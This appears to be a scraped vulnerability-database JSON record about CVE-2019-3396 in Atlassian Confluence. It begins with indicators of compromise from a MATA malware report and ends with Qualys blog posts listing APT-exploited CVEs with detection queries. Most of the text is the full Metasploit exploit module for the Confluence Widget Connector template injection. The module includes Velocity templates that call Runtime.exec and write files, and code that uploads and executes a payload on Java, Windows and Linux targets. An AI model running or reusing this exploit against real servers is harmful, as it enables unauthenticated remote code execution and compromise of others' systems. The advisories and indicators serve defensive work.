We expect this malware to evolve, so we will be monitoring its activity in order to protect our customers.\n\nFor more information please contact: intelreports@kaspersky.com\n\n## Indicators of compromise\n\n### File Hashes (malicious documents, Trojans, emails, decoys)\n\n**Windows Loader**\n\n**Windows MATA**\n\nbea49839390e4f1eb3cb38d0fcaf897e rdata.dat \n8910bdaaa6d3d40e9f60523d3a34f914 sdata.dat \n6a066cf853fe51e3398ef773d016a4a8 \n228998f29864603fd4966cadd0be77fc \nda50a7a05abffb806f4a60c461521f41 \nec05817e19039c2f6cc2c021e2ea0016\n\n**Registry path**\n\nHKLM\\Software\\Microsoft\\KxtNet \nHKLM\\Software\\Microsoft\\HlqNet \nHKLM\\Software\\mthjk\n\n**Linux MATA**\n\n859e7e9a11b37d355955f85b9a305fec mdata.dat \n80c0efb9e129f7f9b05a783df6959812 ldata.dat, mdata.dat \nd2f94e178c254669fb9656d5513356d2 mdata.dat\n\n**Linux log collector**\n\n982bf527b9fe16205fea606d1beed7fa 
hdata.dat\n\n**Open-source Linux SoCat**\n\ne883bf5fd22eb6237eb84d80bbcf2ac9 sdata.dat\n\n**Script for exploiting Atlassian Confluence Server**\n\na99b7ef095f44cf35453465c64f0c70c check.vm, r.vm \n199b4c116ac14964e9646b2f27595156 r.vm\n\n**macOS MATA**\n\n81f8f0526740b55fe484c42126cd8396 TinkaOTP.dmg \nf05437d510287448325bac98a1378de1 SubMenu.nib\n\n### C2 address\n\n", "modified": "2020-07-22T10:00:57", "published": "2020-07-22T10:00:57", "id": "SECURELIST:9C375DB331E2434EE824100A45629096", "href": "https://securelist.com/mata-multi-platform-targeted-malware-framework/97746/", "type": "securelist", "title": "MATA: Multi-platform targeted malware framework", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2019-04-19T23:54:15", "description": "Widget Connector Macro is part of Atlassian Confluence Server and Data Center that allows embedding online videos, slideshows, photostreams and more directly into a page. A _template parameter can be used to inject remote Java code into a Velocity template, and gain code execution. Authentication is not required to exploit this vulnerability. By default, a Java payload will be used because it is cross-platform, but you can also specify which native payload you want (Linux or Windows). 
Confluence before version 6.6.12, from version 6.7.0 before 6.12.3, from version 6.13.0 before 6.13.3 and from version 6.14.0 before 6.14.2 are affected.", "edition": 1, "published": "2019-04-19T00:00:00", "title": "Atlassian Confluence Widget Connector Macro Velocity Template Injection Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-3396"], "modified": "2019-04-19T00:00:00", "id": "1337DAY-ID-32569", "href": "https://0day.today/exploit/description/32569", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::FileDropper\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::Remote::FtpServer\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => \"Atlassian Confluence Widget Connector Macro Velocity Template Injection\",\r\n 'Description' => %q{\r\n Widget Connector Macro is part of Atlassian Confluence Server and Data Center that\r\n allows embedding online videos, slideshows, photostreams and more directly into a page.\r\n A _template parameter can be used to inject remote Java code into a Velocity template,\r\n and gain code execution. 
Authentication is not required to exploit this vulnerability.\r\n By default, a Java payload will be used because it is cross-platform, but you can also\r\n specify which native payload you want (Linux or Windows).\r\n\r\n Confluence before version 6.6.12, from version 6.7.0 before 6.12.3, from version\r\n 6.13.0 before 6.13.3 and from version 6.14.0 before 6.14.2 are affected.\r\n\r\n This vulnerability was originally discovered by Daniil Dmitriev\r\n https://twitter.com/ddv_ua.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Daniil Dmitriev', # Discovering vulnerability\r\n 'Dmitry (rrock) Shchannikov' # Metasploit module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2019-3396' ],\r\n [ 'URL', 'https://confluence.atlassian.com/doc/confluence-security-advisory-2019-03-20-966660264.html' ],\r\n [ 'URL', 'https://chybeta.github.io/2019/04/06/Analysis-for-\u3010CVE-2019-3396\u3011-SSTI-and-RCE-in-Confluence-Server-via-Widget-Connector/'],\r\n [ 'URL', 'https://paper.seebug.org/886/']\r\n ],\r\n 'Targets' =>\r\n [\r\n [ 'Java', { 'Platform' => 'java', 'Arch' => ARCH_JAVA }],\r\n [ 'Windows', { 'Platform' => 'win', 'Arch' => ARCH_X86 }],\r\n [ 'Linux', { 'Platform' => 'linux', 'Arch' => ARCH_X86 }]\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'RPORT' => 8090,\r\n 'SRVPORT' => 8021,\r\n },\r\n 'Privileged' => false,\r\n 'DisclosureDate' => 'Mar 25 2019',\r\n 'DefaultTarget' => 0,\r\n 'Stance' => Msf::Exploit::Stance::Aggressive\r\n ))\r\n\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [true, 'The base path to Confluence', '/']),\r\n OptString.new('TRIGGERURL', [true, 'URL to an external video service to trigger the vulnerability',\r\n 'https://www.youtube.com/watch?v=dQw4w9WgXcQ'])\r\n ])\r\n end\r\n\r\n # Handles ftp RETR command.\r\n #\r\n # @param c [Socket] Control connection socket.\r\n # @param arg [String] RETR argument.\r\n # @return [void]\r\n def on_client_command_retr(c, arg)\r\n vprint_status(\"FTP download request for #{arg}\")\r\n conn = 
establish_data_connection(c)\r\n if(not conn)\r\n c.put(\"425 Can't build data connection\\r\\n\")\r\n return\r\n end\r\n\r\n c.put(\"150 Opening BINARY mode data connection for #{arg}\\r\\n\")\r\n case arg\r\n when /check\\.vm$/\r\n conn.put(wrap(get_check_vm))\r\n when /javaprop\\.vm$/\r\n conn.put(wrap(get_javaprop_vm))\r\n when /upload\\.vm$/\r\n conn.put(wrap(get_upload_vm))\r\n when /exec\\.vm$/\r\n conn.put(wrap(get_exec_vm))\r\n else\r\n conn.put(wrap(get_dummy_vm))\r\n end\r\n c.put(\"226 Transfer complete.\\r\\n\")\r\n conn.close\r\n end\r\n\r\n # Handles ftp PASS command to suppress output.\r\n #\r\n # @param c [Socket] Control connection socket.\r\n # @param arg [String] PASS argument.\r\n # @return [void]\r\n def on_client_command_pass(c, arg)\r\n @state[c][:pass] = arg\r\n vprint_status(\"#{@state[c][:name]} LOGIN #{@state[c][:user]} / #{@state[c][:pass]}\")\r\n c.put \"230 Login OK\\r\\n\"\r\n end\r\n\r\n # Handles ftp EPSV command to suppress output.\r\n #\r\n # @param c [Socket] Control connection socket.\r\n # @param arg [String] EPSV argument.\r\n # @return [void]\r\n def on_client_command_epsv(c, arg)\r\n vprint_status(\"#{@state[c][:name]} UNKNOWN 'EPSV #{arg}'\")\r\n c.put(\"500 'EPSV #{arg}': command not understood.\\r\\n\")\r\n end\r\n\r\n # Returns an upload template.\r\n #\r\n # @return [String]\r\n def get_upload_vm\r\n (\r\n <<~EOF\r\n $i18n.getClass().forName('java.io.FileOutputStream').getConstructor($i18n.getClass().forName('java.lang.String')).newInstance('#{@fname}').write($i18n.getClass().forName('sun.misc.BASE64Decoder').getConstructor(null).newInstance(null).decodeBuffer('#{@b64}'))\r\n EOF\r\n )\r\n end\r\n\r\n # Returns a command execution template.\r\n #\r\n # @return [String]\r\n def get_exec_vm\r\n (\r\n <<~EOF\r\n $i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null).invoke(null, null).exec('#{@command}').waitFor()\r\n EOF\r\n )\r\n end\r\n\r\n # Returns the check template.\r\n #\r\n # @return 
[String]\r\n def get_check_vm\r\n (\r\n <<~EOF\r\n #{@check_text}\r\n EOF\r\n )\r\n end\r\n\r\n # Returns Java's getting property template.\r\n #\r\n # @return [String]\r\n def get_javaprop_vm\r\n (\r\n <<~EOF\r\n $i18n.getClass().forName('java.lang.System').getMethod('getProperty', $i18n.getClass().forName('java.lang.String')).invoke(null, '#{@prop}').toString()\r\n EOF\r\n )\r\n end\r\n\r\n # Returns dummy template.\r\n #\r\n # @return [String]\r\n def get_dummy_vm\r\n (\r\n <<~EOF\r\n EOF\r\n )\r\n end\r\n\r\n # Checks the vulnerability.\r\n #\r\n # @return [Array] Check code\r\n def check\r\n checkcode = Exploit::CheckCode::Safe\r\n begin\r\n # Start the FTP service\r\n print_status(\"Starting the FTP server.\")\r\n start_service\r\n\r\n @check_text = Rex::Text.rand_text_alpha(5..10)\r\n res = inject_template(\"ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}check.vm\")\r\n if res && res.body && res.body.include?(@check_text)\r\n checkcode = Exploit::CheckCode::Vulnerable\r\n end\r\n rescue Msf::Exploit::Failed => e\r\n vprint_error(e.message)\r\n checkcode = Exploit::CheckCode::Unknown\r\n end\r\n checkcode\r\n end\r\n\r\n # Injects Java code to the template.\r\n #\r\n # @param service_url [String] Address of template to injection.\r\n # @return [void]\r\n def inject_template(service_url, timeout=20)\r\n\r\n uri = normalize_uri(target_uri.path, 'rest', 'tinymce', '1', 'macro', 'preview')\r\n\r\n res = send_request_cgi({\r\n 'method' => 'POST',\r\n 'uri' => uri,\r\n 'headers' => {\r\n 'Accept' => '*/*',\r\n 'Origin' => full_uri(vhost_uri: true)\r\n },\r\n 'ctype' => 'application/json; charset=UTF-8',\r\n 'data' => {\r\n 'contentId' => '1',\r\n 'macro' => {\r\n 'name' => 'widget',\r\n 'body' => '',\r\n 'params' => {\r\n 'url' => datastore['TRIGGERURL'],\r\n '_template' => service_url\r\n }\r\n\r\n }\r\n }.to_json\r\n }, timeout=timeout)\r\n\r\n unless res\r\n unless service_url.include?(\"exec.vm\")\r\n 
print_warning('Connection timed out in #inject_template')\r\n end\r\n return\r\n end\r\n\r\n if res.body.include? 'widget-error'\r\n print_error('Failed to inject and execute code:')\r\n else\r\n vprint_status(\"Server response:\")\r\n end\r\n\r\n vprint_line(res.body)\r\n\r\n res\r\n end\r\n\r\n # Returns a system property for Java.\r\n #\r\n # @param prop [String] Name of the property to retrieve.\r\n # @return [String]\r\n def get_java_property(prop)\r\n @prop = prop\r\n res = inject_template(\"ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}javaprop.vm\")\r\n if res && res.body\r\n return clear_response(res.body)\r\n end\r\n ''\r\n end\r\n\r\n # Returns the target platform.\r\n #\r\n # @return [String]\r\n def get_target_platform\r\n return get_java_property('os.name')\r\n end\r\n\r\n # Checks if the target os/platform is compatible with the module target or not.\r\n #\r\n # @return [TrueClass] Compatible\r\n # @return [FalseClass] Not compatible\r\n def target_platform_compat?(target_platform)\r\n target.platform.names.each do |n|\r\n if n.downcase == 'java' || target_platform.downcase.include?(n.downcase)\r\n return true\r\n end\r\n end\r\n\r\n false\r\n end\r\n\r\n # Returns a temp path from the remote target.\r\n #\r\n # @return [String]\r\n def get_tmp_path\r\n return get_java_property('java.io.tmpdir')\r\n end\r\n\r\n # Returns the Java home path used by Confluence.\r\n #\r\n # @return [String]\r\n def get_java_home_path\r\n return get_java_property('java.home')\r\n end\r\n\r\n # Returns Java code that can be used to inject to the template in order to copy a file.\r\n #\r\n # @note The purpose of this method is to have a file that is not busy, so we can execute it.\r\n # It is meant to be used with #get_write_file_code.\r\n #\r\n # @param fname [String] The file to copy\r\n # @param new_fname [String] The new file\r\n # @return [void]\r\n def get_dup_file_code(fname, new_fname)\r\n if fname =~ /^\\/[[:print:]]+/\r\n 
@command = \"cp #{fname} #{new_fname}\"\r\n else\r\n @command = \"cmd.exe /C copy #{fname} #{new_fname}\"\r\n end\r\n\r\n inject_template(\"ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm\")\r\n end\r\n\r\n # Returns the normalized file path for the payload.\r\n #\r\n # @return [String]\r\n def normalize_payload_fname(tmp_path, fname)\r\n # A quick way to check platform instead of actually grabbing os.name in Java system properties.\r\n if /^\\/[[:print:]]+/ === tmp_path\r\n Rex::FileUtils.normalize_unix_path(tmp_path, fname)\r\n else\r\n Rex::FileUtils.normalize_win_path(tmp_path, fname)\r\n end\r\n end\r\n\r\n # Exploits the target in Java platform.\r\n #\r\n # @return [void]\r\n def exploit_as_java\r\n\r\n tmp_path = get_tmp_path\r\n\r\n if tmp_path.blank?\r\n fail_with(Failure::Unknown, 'Unable to get the temp path.')\r\n end\r\n\r\n @fname = normalize_payload_fname(tmp_path, \"#{Rex::Text.rand_text_alpha(5)}.jar\")\r\n @b64 = Rex::Text.encode_base64(payload.encoded_jar)\r\n @command = ''\r\n\r\n java_home = get_java_home_path\r\n\r\n if java_home.blank?\r\n fail_with(Failure::Unknown, 'Unable to find java home path on the remote machine.')\r\n else\r\n vprint_status(\"Found Java home path: #{java_home}\")\r\n end\r\n\r\n register_files_for_cleanup(@fname)\r\n\r\n if /^\\/[[:print:]]+/ === @fname\r\n normalized_java_path = Rex::FileUtils.normalize_unix_path(java_home, '/bin/java')\r\n @command = %Q|#{normalized_java_path} -jar #{@fname}|\r\n else\r\n normalized_java_path = Rex::FileUtils.normalize_win_path(java_home, '\\\\bin\\\\java.exe')\r\n @fname.gsub!(/Program Files/, 'PROGRA~1')\r\n @command = %Q|cmd.exe /C \"#{normalized_java_path}\" -jar #{@fname}|\r\n end\r\n\r\n print_status(\"Attempting to upload #{@fname}\")\r\n inject_template(\"ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}upload.vm\")\r\n\r\n print_status(\"Attempting to execute #{@fname}\")\r\n 
inject_template(\"ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm\", timeout=5)\r\n end\r\n\r\n\r\n # Exploits the target in Windows platform.\r\n #\r\n # @return [void]\r\n def exploit_as_windows\r\n tmp_path = get_tmp_path\r\n\r\n if tmp_path.blank?\r\n fail_with(Failure::Unknown, 'Unable to get the temp path.')\r\n end\r\n\r\n @b64 = Rex::Text.encode_base64(generate_payload_exe(code: payload.encoded, arch: target.arch, platform: target.platform))\r\n @fname = normalize_payload_fname(tmp_path,\"#{Rex::Text.rand_text_alpha(5)}.exe\")\r\n new_fname = normalize_payload_fname(tmp_path,\"#{Rex::Text.rand_text_alpha(5)}.exe\")\r\n @fname.gsub!(/Program Files/, 'PROGRA~1')\r\n new_fname.gsub!(/Program Files/, 'PROGRA~1')\r\n register_files_for_cleanup(@fname, new_fname)\r\n\r\n print_status(\"Attempting to upload #{@fname}\")\r\n inject_template(\"ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}upload.vm\")\r\n\r\n print_status(\"Attempting to copy payload to #{new_fname}\")\r\n get_dup_file_code(@fname, new_fname)\r\n\r\n print_status(\"Attempting to execute #{new_fname}\")\r\n @command = new_fname\r\n inject_template(\"ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm\", timeout=5)\r\n end\r\n\r\n\r\n # Exploits the target in Linux platform.\r\n #\r\n # @return [void]\r\n def exploit_as_linux\r\n tmp_path = get_tmp_path\r\n\r\n if tmp_path.blank?\r\n fail_with(Failure::Unknown, 'Unable to get the temp path.')\r\n end\r\n\r\n @b64 = Rex::Text.encode_base64(generate_payload_exe(code: payload.encoded, arch: target.arch, platform: target.platform))\r\n @fname = normalize_payload_fname(tmp_path, Rex::Text.rand_text_alpha(5))\r\n new_fname = normalize_payload_fname(tmp_path, Rex::Text.rand_text_alpha(6))\r\n register_files_for_cleanup(@fname, new_fname)\r\n\r\n print_status(\"Attempting to upload #{@fname}\")\r\n 
inject_template(\"ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}upload.vm\")\r\n\r\n @command = \"chmod +x #{@fname}\"\r\n inject_template(\"ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm\")\r\n\r\n print_status(\"Attempting to copy payload to #{new_fname}\")\r\n get_dup_file_code(@fname, new_fname)\r\n\r\n print_status(\"Attempting to execute #{new_fname}\")\r\n @command = new_fname\r\n inject_template(\"ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm\", timeout=5)\r\n end\r\n\r\n def exploit\r\n @wrap_marker = Rex::Text.rand_text_alpha(5..10)\r\n\r\n # Start the FTP service\r\n print_status(\"Starting the FTP server.\")\r\n start_service\r\n\r\n target_platform = get_target_platform\r\n if target_platform.nil?\r\n fail_with(Failure::Unreachable, 'Target did not respond to OS check. Confirm RHOSTS and RPORT, then run \"check\".')\r\n else\r\n print_status(\"Target being detected as: #{target_platform}\")\r\n end\r\n\r\n unless target_platform_compat?(target_platform)\r\n fail_with(Failure::BadConfig, 'Selected module target does not match the actual target.')\r\n end\r\n\r\n case target.name.downcase\r\n when /java$/\r\n exploit_as_java\r\n when /windows$/\r\n exploit_as_windows\r\n when /linux$/\r\n exploit_as_linux\r\n end\r\n end\r\n\r\n # Wraps request.\r\n #\r\n # @return [String]\r\n def wrap(string)\r\n \"#{@wrap_marker}\\n#{string}#{@wrap_marker}\\n\"\r\n end\r\n\r\n # Returns unwrapped response.\r\n #\r\n # @return [String]\r\n def clear_response(string)\r\n if match = string.match(/#{@wrap_marker}\\n(.*)\\n#{@wrap_marker}\\n/m)\r\n return match.captures[0]\r\n end\r\n end\r\nend\n\n# 0day.today [2019-04-19] #", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/32569"}], "qualysblog": [{"lastseen": "2019-12-27T19:32:53", "bulletinFamily": 
"blog", "cvelist": ["CVE-2012-0158", "CVE-2017-0143", "CVE-2017-0199", "CVE-2017-10271", "CVE-2017-11882", "CVE-2017-5638", "CVE-2017-5715", "CVE-2017-8570", "CVE-2017-8759", "CVE-2018-0802", "CVE-2018-10561", "CVE-2018-12130", "CVE-2018-20250", "CVE-2018-4878", "CVE-2018-7600", "CVE-2018-8174", "CVE-2019-0708", "CVE-2019-2725", "CVE-2019-3396"], "description": "[A recent report](<https://www.darkreading.com/threat-intelligence/20-vulnerabilities-to-prioritize-patching-before-2020/d/d-id/1336691>) identified 19+ vulnerabilities that should be mitigated by the end of 2019. These are among the top vulnerabilities exploited by Advanced Persistent Threat (APT) actors from all parts of the world.\n\nThe list below shows those top 19 vulnerabilities, and it should be no surprise that you can easily track and remediate them via a dashboard within Qualys. Import the dashboard into your subscription for easy insight into what assets and vulnerabilities in your organization are at risk.\n\n**No.** | **CVE** | **Products Affected by CVE** | **CVSS Score (NVD)** | **Examples of Threat Actors** \n---|---|---|---|--- \n**1** | CVE-2017-11882 | Microsoft Office | 7.8 | APT32 (Vietnam), APT34 (Iran), APT40 (China), APT-C-35 (India), Cobalt Group (Spain, Ukraine), Silent Group (Russia), Lotus Blossom (China), FIN7 (Russia) \n**2** | CVE-2018-8174 | Microsoft Windows | 7.5 | Silent Group (Russia), Dark Hotel APT (North Korea) \n**3** | CVE-2017-0199 | Microsoft Office, Windows | 7.8 | APT34 (Iran), APT40 (China), APT-C-35 (India), Cobalt Group (Spain, Ukraine), APT37 (North Korea), Silent Group (Russia), Gorgon Group (Pakistan), Gaza Cybergang (Iran) \n**4** | CVE-2018-4878 | Adobe Flash Player, Red Hat Enterprise Linux | 9.8 | APT37 (North Korea), Lazarus Group (North Korea) \n**5** | CVE-2017-10271 | Oracle WebLogic Server | 7.5 | Rocke Gang (Chinese Cybercrime) \n**6** | CVE-2019-0708 | Microsoft Windows | 9.8 | Kelvin SecTeam (Venezuela, Colombia, Peru) \n**7** | 
CVE-2017-5638 | Apache Struts | 10 | Lazarus Group (North Korea) \n**8** | CVE-2017-5715 | ARM, Intel | 5.6 | Unknown \n**9** | CVE-2017-8759 | Microsoft .net Framework | 7.8 | APT40 (China), Cobalt Group (Spain, Ukraine), APT10 (China) \n**10** | CVE-2018-20250 | RARLAB WinRAR | 7.8 | APT32 (Vietnam), APT33 (Iran), APT-C-27 (Iran), Lazarus Group (North Korea), MuddyWater APT (Iran) \n**11** | CVE-2018-7600 | Debian, Drupal | 9.8 | Kelvin SecTeam (Venezuela, Colombia, Peru), Sea Turtle (Iran) \n**12** | CVE-2018-10561 | DASAN Networks | 9.8 | Kelvin SecTeam (Venezuela, Colombia, Peru) \n**13** | CVE-2012-0158 | Microsoft | N/A; 9.3* | APT28 (Russia), APT-C-35 (India), Cobalt Group (Spain, Ukraine), Lotus Blossom (China), Goblin Panda (China), Gorgon Group (Pakistan), APT40 (China) \n**14** | CVE-2017-8570 | Microsoft Office | 7.8 | APT-C-35 (India), Cobalt Group (Spain, Ukraine), APT23 (China) \n**15** | CVE-2018-0802 | Microsoft Office | 7.8 | Cobalt Group (Spain, Ukraine), APT37 (North Korea), Silent Group (Russia), Cloud Atlas (Unknown), Cobalt Group (Spain, Ukraine), Goblin Panda (China), APT23 (China), APT27 (China), Rancor Group (China), Temp.Trident (China) \n**16** | CVE-2017-0143 | Microsoft SMB | 8.1 | APT3 (China), Calypso (China) \n**17** | CVE-2018-12130 | Fedora | 5.6 | Iron Tiger (China), APT3 (China), Calypso (China) \n**18** | CVE-2019-2725 | Oracle WebLogic Server | 9.8 | Panda (China) \n**19** | CVE-2019-3396 | Atlassian Confluence | 9.8 | APT41 (China), Rocke Gang (Chinese Cybercrime) \n \n* according to [cvedetails.com](<http://cvedetails.com/>)\n\n### Detecting the Top 19 CVEs\n\nQualys has detections (QIDs) for [Qualys Vulnerability Management](<https://www.qualys.com/apps/vulnerability-management/>) that cover authenticated and remotely detected vulnerabilities supported by Qualys scanners and [Qualys Cloud Agent](<https://www.qualys.com/cloud-agent/>).\n\nTo return a list of all impacted hosts, use the following QQL query within the VM 
Dashboard:\n \n \n vulnerabilities.vulnerability.cveIds:[CVE-2017-11882, CVE-2018-8174, CVE-2017-0199, CVE-2018-4878, CVE-2017-10271, CVE-2019-0708, CVE-2017-5638, CVE-2017-5715, CVE-2017-8759, CVE-2018-20250, CVE-2018-7600, CVE-2018-10561, CVE-2012-0158, CVE-2017-8570, CVE-2018-0802, CVE-2017-0143, CVE-2018-12130, CVE-2019-2725, CVE-2019-3396]\n\nYou can [import the following dashboard to track all 19 CVEs](<https://discussions.qualys.com/docs/DOC-7032>) as shown in the template below:\n\n[](<https://discussions.qualys.com/docs/DOC-7032>)\n\n### Alerts\n\nThe Qualys Cloud Platform enables you to continuously monitor for vulnerabilities and misconfigurations and get alerted for your most critical assets.\n\nSee how to set up [notifications for new and updated QIDs](<https://www.qualys.com/docs/version/8.21/qualys-vulnerability-notification.pdf>).\n\n### Tracking Per-Year Environment Impact and Remediation\n\nThe Qualys visualization team has included a Per-Year Environment Insight View Dashboard for easy tracking and remediation. This dashboard has been included in release 2.42 and can be found within the dashboard templates library. 
It will automatically show your systems whether scanned internally, externally or on remote mobile computers with the groundbreaking Qualys Cloud Agent.\n\n\n\nThis Per-Year Environment Insight View Dashboard will display data per year based on First Found date, followed by Vulnerability Status, Severity, Compliance, Real-Time Threat Intelligence (RTI)s from [Qualys Threat Protection](<https://www.qualys.com/apps/threat-protection/>), and Vulnerability Published Dates, allowing for an easy glance across your environment.\n\n\n\n \n\n### Get Started Now\n\nTo start detecting and remediating these vulnerabilities now, get a [Qualys Suite trial](<https://www.qualys.com/forms/trials/suite/>).\n\nVisit the [Qualys Community](<https://community.qualys.com/docs/DOC-6785>) to download other dashboards created by your SMEs and Product Management team and import them into your subscription for further data insights.", "modified": "2019-12-27T18:01:22", "published": "2019-12-27T18:01:22", "id": "QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4", "href": "https://blog.qualys.com/technology/2019/12/27/top-19-vulnerability-cves-in-santas-dashboard-tracking", "type": "qualysblog", "title": "Top 19+ Vulnerability CVEs in Santa\u2019s Dashboard Tracking", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-23T16:02:16", "bulletinFamily": "blog", "cvelist": ["CVE-2015-4852", "CVE-2017-6327", "CVE-2018-4939", "CVE-2018-6789", "CVE-2019-0708", "CVE-2019-0803", "CVE-2019-10149", "CVE-2019-1040", "CVE-2019-11510", "CVE-2019-11580", "CVE-2019-18935", "CVE-2019-19781", "CVE-2019-3396", "CVE-2020-0601", "CVE-2020-0688", "CVE-2020-10189", "CVE-2020-1350", "CVE-2020-1472", "CVE-2020-15505", "CVE-2020-2555", "CVE-2020-3118", "CVE-2020-5902", "CVE-2020-8193", "CVE-2020-8195", "CVE-2020-8196", "CVE-2020-8515"], "description": "On October 20, 2020, the United States National Security Agency (NSA) released a [cybersecurity 
advisory](<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>) on Chinese state-sponsored malicious cyber activity. The NSA alert provided a list of 25 publicly known vulnerabilities that are known to have been recently leveraged by cyber actors in various hacking operations.\n\n"Since these techniques include exploitation of publicly known vulnerabilities, it is critical that network defenders prioritize patching and mitigation efforts," said the NSA advisory. It also recommended "critical system owners consider these actions a priority, in order to mitigate the loss of sensitive information that could impact U.S. policies, strategies, plans, and competitive advantage."\n\nEarlier this year, the NSA also announced Sandworm actors exploiting the [Exim MTA Vulnerability](<https://blog.qualys.com/product-tech/2020/05/29/nsa-announces-sandworm-actors-exploiting-exim-mta-vulnerability-cve-2019-10149>). Similar alerts have been published by the Cybersecurity and Infrastructure Security Agency (CISA) over the last year. CISA also issued an [advisory](<https://us-cert.cisa.gov/ncas/alerts/aa20-275a>) warning about vulnerabilities that were exploited in the wild to retrieve sensitive data such as intellectual property and economic, political, and military information. 
\n\nHere is a list of the 25 publicly known vulnerabilities (CVEs) published by the NSA, along with the affected products and the associated Qualys VMDR QID(s) for each vulnerability:\n\n**CVE-ID(s)**| **Affected products**| **Qualys QID(s)** \n---|---|--- \nCVE-2020-5902| Big-IP devices| 38791, 373106 \nCVE-2019-19781| Citrix Application Delivery Controller, Citrix Gateway, Citrix SDWAN WANOP| 150273, 372305, 372685 \nCVE-2019-11510| Pulse Connect Secure| 38771 \nCVE-2020-8193, CVE-2020-8195, CVE-2020-8196| Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18; Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7| 13833, 373116 \nCVE-2019-0708| Microsoft Windows multiple products| 91541, 91534 \nCVE-2020-15505| MobileIron Core & Connector| 13998 \nCVE-2020-1350| Microsoft Windows multiple products| 91662 \nCVE-2020-1472| Microsoft Windows multiple products| 91688 \nCVE-2019-1040| Microsoft Windows multiple products| 91653 \nCVE-2018-6789| Exim before 4.90.1| 50089 \nCVE-2020-0688| Multiple Microsoft Exchange Server versions| 50098 \nCVE-2018-4939| Adobe ColdFusion| 370874 \nCVE-2015-4852| Oracle WebLogic Server 10.3.6.0, 12.1.2.0, 12.1.3.0, and 12.2.1.0| 86362, 86340 \nCVE-2020-2555| Oracle Coherence product of Oracle Fusion Middleware; versions 3.7.1.0, 12.1.3.0.0, 12.2.1.3.0 and 12.2.1.4.0| 372345 \nCVE-2019-3396| Atlassian Confluence Server before version 6.6.12, from version 6.7.0 before 6.12.3, from version 6.13.0 before 6.13.3, and from version 6.14.0 before 6.14.2| 13459 \nCVE-2019-11580| Atlassian Crowd and Crowd Data Center| 13525 \nCVE-2020-10189| Zoho ManageEngine Desktop Central before 10.0.474| 372442 \nCVE-2019-18935| Progress Telerik UI for ASP.NET AJAX through 2019.3.1023| 372327, 150299 \nCVE-2020-0601| Microsoft Windows multiple products| 91595 \nCVE-2019-0803| Microsoft Windows multiple products| 91522 \nCVE-2017-6327| Symantec Messaging Gateway before 10.6.3-267| 11856 \nCVE-2020-3118| 
Cisco IOS XR, NCS| 316792 \nCVE-2020-8515| DrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta, and Vigor300B 1.3.3_Beta, 1.4.2.1_Beta, and 1.4.4_Beta devices| 13730 \n \n## Detect 25 Publicly Known Vulnerabilities using VMDR\n\nQualys released several remote and authenticated QIDs for commonly exploited vulnerabilities. You can search for these QIDs in the VMDR Dashboard by using the following QQL query:\n\n_vulnerabilities.vulnerability.cveIds: [CVE-2019-11510,CVE-2020-5902,CVE-2019-19781,CVE-2020-8193,CVE-2020-8195,CVE-2020-8196,CVE-2019-0708,CVE-2020-15505,CVE-2020-1472,CVE-2019-1040,CVE-2020-1350,CVE-2018-6789,CVE-2018-4939,CVE-2020-0688,CVE-2015-4852,CVE-2020-2555,CVE-2019-3396,CVE-2019-11580,CVE-2020-10189,CVE-2019-18935,CVE-2020-0601,CVE-2019-0803,CVE-2017-6327,CVE-2020-3118,CVE-2020-8515]_\n\nUsing [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), customers can effectively prioritize these vulnerabilities by the "Active Attack" RTI:\n\n### Identify Vulnerable Assets using Qualys Threat Protection\n\nIn addition, Qualys customers can locate vulnerable hosts through [Qualys Threat Protection](<https://www.qualys.com/apps/threat-protection/>) by simply clicking on the impacted hosts. This helps in effectively identifying and tracking these vulnerabilities.\n\nWith the VMDR Dashboard, you can track the 25 publicly known exploited vulnerabilities, their impacted hosts, their status and overall management in real time. 
